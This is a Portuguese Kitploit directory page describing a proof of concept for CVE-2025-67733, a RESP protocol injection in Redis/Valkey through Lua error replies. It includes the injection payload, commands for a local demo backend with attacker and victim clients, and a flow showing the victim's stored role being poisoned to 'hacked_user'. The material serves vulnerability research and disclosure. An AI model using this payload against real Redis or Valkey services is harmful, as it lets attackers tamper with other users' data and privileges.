Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-67733 — Redis/Valkey RESP Injection PoC (CVE-2025-67733) | Kitploit
Ferramentas/GitHubGitHub/jylab/cve-2025-67733
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubjylab/cve-2025-67733

CVE-2025-67733

Redis/Valkey RESP Injection PoC (CVE-2025-67733)

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito de Injeção de Protocolo RESP

Prova de conceito demonstrando vulnerabilidade de Injeção de Protocolo RESP através de mensagens de erro de script Lua no Valkey/Redis.

Arquivos

backend.py

Backend Flask simulando uma aplicação web com conexão compartilhada Valkey (pool de conexões).

Endpoints:

MétodoEndpointDescrição
POST/api/user/roleDefinir função de usuário
GET/api/user/roleObter função de usuário
POST/api/processExecutar script Lua

Uso:

root@kitploit:~
python backend.py <Valkey host> <Valkey port> [password]

# Examples
python backend.py 127.0.0.1 6379
python backend.py 127.0.0.1 6379 mypassword

attacker_client.py

Injeta dados maliciosos RESP no buffer do socket através da mensagem de erro do script Lua.

Payload:

root@kitploit:~
error(redis.error_reply("INJECTED\r\n$11\r\nhacked_user"))

Uso:

root@kitploit:~
python attacker_client.py

victim_client.py

Cliente legítimo que define e obtém funções de usuário.

Uso:

root@kitploit:~
python victim_client.py set    # Definir função como "normal_user"
python victim_client.py get    # Obter função atual

Demonstração do Ataque

Pré-requisitos

root@kitploit:~
pip install flask requests

Passos

Terminal 1 - Iniciar Backend:

root@kitploit:~
python backend.py 127.0.0.1 6379

Terminal 2 - Definir Função:

root@kitploit:~
python victim_client.py set
# Saída: 'role':'normal_user' foi definido.

python victim_client.py get
# Saída: 'role':'normal_user'

Terminal 3 - Ataque:

root@kitploit:~
python attacker_client.py
# Saída: Envenenamento de socket bem-sucedido

Terminal 2 - Obter Função (Após Ataque):

root@kitploit:~
python victim_client.py get
# Saída: 'role':'hacked_user'

Fluxo do Ataque

root@kitploit:~
1. Vítima define função
   victim_client.py set --> Backend --> Valkey
                                        SET user:user:role "normal_user"

2. Atacante injeta payload
   attacker_client.py --> Backend --> Valkey
                                      EVAL 'error(...)' 0

   Backend lê: "-ERR INJECTED\r\n"
   Buffer permanece: "$11\r\nhacked_user"

3. Vítima obtém função
   victim_client.py get --> Backend --> Valkey
                                        GET user:user:role

   Backend lê do buffer: "$11\r\nhacked_user"
   Vítima recebe: "hacked_user"
Baixar ferramenta